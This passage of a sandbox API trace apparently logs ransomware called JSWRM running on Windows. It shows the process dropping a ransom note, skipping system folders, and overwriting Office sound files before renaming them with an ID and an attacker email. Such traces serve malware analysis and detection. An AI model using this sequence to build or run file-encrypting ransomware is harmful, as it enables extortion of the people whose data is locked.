returned 1 [0134.812] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeda173cc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1b22ac67, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1b22ac67, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="Media", cAlternateFileName="")) returned 1 [0134.812] lstrcmpiW (lpString1="Media", lpString2=".") returned 1 [0134.812] lstrcmpiW (lpString1="Media", lpString2="..") returned 1 [0134.812] lstrcmpiW (lpString1="Media", lpString2="...") returned 1 [0134.812] lstrcmpiW (lpString1="Media", lpString2="windows") returned -1 [0134.813] lstrcmpiW (lpString1="Media", lpString2="recovery") returned -1 [0134.813] lstrcmpiW (lpString1="Media", lpString2="perflogs") returned -1 [0134.813] lstrcmpiW (lpString1="Media", lpString2="documents and settings") returned 1 [0134.813] lstrcmpiW (lpString1="Media", lpString2="$RECYCLE.BIN") returned 1 [0134.813] lstrcmpiW (lpString1="Media", lpString2="system volume information") returned -1 [0134.813] lstrcmpiW (lpString1="Media", lpString2="msocache") returned -1 [0134.813] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\jswrm-decrypt.hta")) returned 0xffffffff [0134.815] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0134.815] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0134.815] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0134.817] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.817] WriteFile (in: hFile=0x45c, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0134.819] CloseHandle (hObject=0x45c) returned 1 [0134.819] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\jswrm-decrypt.hta")) returned 0x20 [0134.819] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeda173cc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1b22ac67, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4705ba75, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1348, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x231d40 [0134.820] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0134.820] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeda173cc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1b22ac67, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4705ba75, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0134.820] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0134.820] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0134.821] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a913cc8, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a913cc8, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a939f30, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6daa, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="APPLAUSE.WAV", cAlternateFileName="")) returned 1 [0134.821] lstrcmpiW (lpString1="APPLAUSE.WAV", lpString2=".") returned 1 [0134.821] lstrcmpiW (lpString1="APPLAUSE.WAV", lpString2="..") returned 1 [0134.821] lstrcmpiW (lpString1="APPLAUSE.WAV", lpString2="...") returned 1 [0134.821] lstrcmpiW (lpString1="APPLAUSE.WAV", lpString2="windows") returned -1 [0134.821] lstrcmpiW (lpString1="APPLAUSE.WAV", lpString2="recovery") returned -1 [0134.821] lstrcmpiW (lpString1="APPLAUSE.WAV", lpString2="perflogs") returned -1 [0134.821] lstrcmpiW (lpString1="APPLAUSE.WAV", lpString2="documents and settings") returned -1 [0134.821] lstrcmpiW (lpString1="APPLAUSE.WAV", lpString2="$RECYCLE.BIN") returned 1 [0134.821] lstrcmpiW (lpString1="APPLAUSE.WAV", lpString2="system volume information") returned -1 [0134.821] lstrcmpiW (lpString1="APPLAUSE.WAV", lpString2="msocache") returned -1 [0134.821] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="APPLAUSE.WAV", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0134.821] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="APPLAUSE.WAV", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="APPLAUSE.WAV", lpUsedDefaultChar=0x0) returned 12 [0134.821] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="APPLAUSE.WAV", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0134.821] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="APPLAUSE.WAV", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="APPLAUSE.WAV", lpUsedDefaultChar=0x0) returned 12 [0134.821] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0134.821] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0134.821] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\APPLAUSE.WAV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\applause.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0134.822] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=28074) returned 1 [0134.822] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.822] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x6da0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x6da0, lpOverlapped=0x0) returned 1 [0134.826] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.826] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x6da0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x6da0, lpOverlapped=0x0) returned 1 [0134.826] CloseHandle (hObject=0x238) returned 1 [0134.830] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\APPLAUSE.WAV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\applause.wav"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\APPLAUSE.WAV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\applause.wav.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0134.831] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a8edb08, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a8edb08, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a939f30, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x59f6, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="ARROW.WAV", cAlternateFileName="")) returned 1 [0134.831] lstrcmpiW (lpString1="ARROW.WAV", lpString2=".") returned 1 [0134.831] lstrcmpiW (lpString1="ARROW.WAV", lpString2="..") returned 1 [0134.831] lstrcmpiW (lpString1="ARROW.WAV", lpString2="...") returned 1 [0134.831] lstrcmpiW (lpString1="ARROW.WAV", lpString2="windows") returned -1 [0134.831] lstrcmpiW (lpString1="ARROW.WAV", lpString2="recovery") returned -1 [0134.831] lstrcmpiW (lpString1="ARROW.WAV", lpString2="perflogs") returned -1 [0134.831] lstrcmpiW (lpString1="ARROW.WAV", lpString2="documents and settings") returned -1 [0134.831] lstrcmpiW (lpString1="ARROW.WAV", lpString2="$RECYCLE.BIN") returned 1 [0134.831] lstrcmpiW (lpString1="ARROW.WAV", lpString2="system volume information") returned -1 [0134.831] lstrcmpiW (lpString1="ARROW.WAV", lpString2="msocache") returned -1 [0134.831] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ARROW.WAV", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0134.831] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ARROW.WAV", cchWideChar=9, lpMultiByteStr=0x345ebd8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ARROW.WAV", lpUsedDefaultChar=0x0) returned 9 [0134.831] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ARROW.WAV", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0134.831] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ARROW.WAV", cchWideChar=9, lpMultiByteStr=0x345eba8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ARROW.WAV", lpUsedDefaultChar=0x0) returned 9 [0134.831] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0134.831] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0134.831] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\ARROW.WAV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\arrow.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0134.835] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=23030) returned 1 [0134.835] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.835] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x59f0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x59f0, lpOverlapped=0x0) returned 1 [0134.843] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.843] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x59f0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x59f0, lpOverlapped=0x0) returned 1 [0134.843] CloseHandle (hObject=0x238) returned 1 [0134.843] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\ARROW.WAV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\arrow.wav"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\ARROW.WAV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\arrow.wav.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0134.868] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a8edb08, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a8edb08, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a913cc8, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2f676, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="BOMB.WAV", cAlternateFileName="")) returned 1 [0134.868] lstrcmpiW (lpString1="BOMB.WAV", lpString2=".") returned 1 [0134.868] lstrcmpiW (lpString1="BOMB.WAV", lpString2="..") returned 1 [0134.868] lstrcmpiW (lpString1="BOMB.WAV", lpString2="...") returned 1 [0134.868] lstrcmpiW (lpString1="BOMB.WAV", lpString2="windows") returned -1 [0134.868] lstrcmpiW (lpString1="BOMB.WAV", lpString2="recovery") returned -1 [0134.868] lstrcmpiW (lpString1="BOMB.WAV", lpString2="perflogs") returned -1 [0134.868] lstrcmpiW (lpString1="BOMB.WAV", lpString2="documents and settings") returned -1 [0134.868] lstrcmpiW (lpString1="BOMB.WAV", lpString2="$RECYCLE.BIN") returned 1 [0134.868] lstrcmpiW (lpString1="BOMB.WAV", lpString2="system volume information") returned -1 [0134.868] lstrcmpiW (lpString1="BOMB.WAV", lpString2="msocache") returned -1 [0134.868] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BOMB.WAV", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0134.869] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BOMB.WAV", cchWideChar=8, lpMultiByteStr=0x345ebd8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BOMB.WAV", lpUsedDefaultChar=0x0) returned 8 [0134.869] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BOMB.WAV", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0134.869] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BOMB.WAV", cchWideChar=8, lpMultiByteStr=0x345eba8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BOMB.WAV", lpUsedDefaultChar=0x0) returned 8 [0134.869] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0134.869] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0134.869] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\BOMB.WAV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\bomb.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0134.870] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=194166) returned 1 [0134.870] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.871] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0134.883] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.883] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0134.883] CloseHandle (hObject=0x238) returned 1 [0134.883] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\BOMB.WAV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\bomb.wav"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\BOMB.WAV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\bomb.wav.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0134.885] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1b0d373e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1b0d373e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1b0f9971, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x10c2, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="BREEZE.WAV", cAlternateFileName="")) returned 1 [0134.885] lstrcmpiW (lpString1="BREEZE.WAV", lpString2=".") returned 1 [0134.885] lstrcmpiW (lpString1="BREEZE.WAV", lpString2="..") returned 1 [0134.885] lstrcmpiW (lpString1="BREEZE.WAV", lpString2="...") returned 1 [0134.885] lstrcmpiW (lpString1="BREEZE.WAV", lpString2="windows") returned -1 [0134.885] lstrcmpiW (lpString1="BREEZE.WAV", lpString2="recovery") returned -1 [0134.885] lstrcmpiW (lpString1="BREEZE.WAV", lpString2="perflogs") returned -1 [0134.885] lstrcmpiW (lpString1="BREEZE.WAV", lpString2="documents and settings") returned -1 [0134.885] lstrcmpiW (lpString1="BREEZE.WAV", lpString2="$RECYCLE.BIN") returned 1 [0134.885] lstrcmpiW (lpString1="BREEZE.WAV", lpString2="system volume information") returned -1 [0134.885] lstrcmpiW (lpString1="BREEZE.WAV", lpString2="msocache") returned -1 [0134.885] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BREEZE.WAV", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0134.885] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BREEZE.WAV", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BREEZE.WAV", lpUsedDefaultChar=0x0) returned 10 [0134.885] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BREEZE.WAV", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0134.885] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BREEZE.WAV", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BREEZE.WAV", lpUsedDefaultChar=0x0) returned 10 [0134.885] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0134.885] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0134.885] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\BREEZE.WAV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\breeze.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0134.886] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4290) returned 1 [0134.886] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.886] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x10c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x10c0, lpOverlapped=0x0) returned 1 [0134.889] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.889] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x10c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x10c0, lpOverlapped=0x0) returned 1 [0134.889] CloseHandle (hObject=0x238) returned 1 [0134.889] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\BREEZE.WAV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\breeze.wav"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\BREEZE.WAV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\breeze.wav.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0134.890] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1af55fee, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1af55fee, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1af7c22b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1594, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="CAMERA.WAV", cAlternateFileName="")) returned 1 [0134.890] lstrcmpiW (lpString1="CAMERA.WAV", lpString2=".") returned 1 [0134.890] lstrcmpiW (lpString1="CAMERA.WAV", lpString2="..") returned 1 [0134.890] lstrcmpiW (lpString1="CAMERA.WAV", lpString2="...") returned 1 [0134.890] lstrcmpiW (lpString1="CAMERA.WAV", lpString2="windows") returned -1 [0134.890] lstrcmpiW (lpString1="CAMERA.WAV", lpString2="recovery") returned -1 [0134.890] lstrcmpiW (lpString1="CAMERA.WAV", lpString2="perflogs") returned -1 [0134.890] lstrcmpiW (lpString1="CAMERA.WAV", lpString2="documents and settings") returned -1 [0134.890] lstrcmpiW (lpString1="CAMERA.WAV", lpString2="$RECYCLE.BIN") returned 1 [0134.890] lstrcmpiW (lpString1="CAMERA.WAV", lpString2="system volume information") returned -1 [0134.890] lstrcmpiW (lpString1="CAMERA.WAV", lpString2="msocache") returned -1 [0134.890] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CAMERA.WAV", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0134.890] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CAMERA.WAV", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CAMERA.WAV", lpUsedDefaultChar=0x0) returned 10 [0134.890] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CAMERA.WAV", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0134.890] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CAMERA.WAV", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CAMERA.WAV", lpUsedDefaultChar=0x0) returned 10 [0134.890] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, 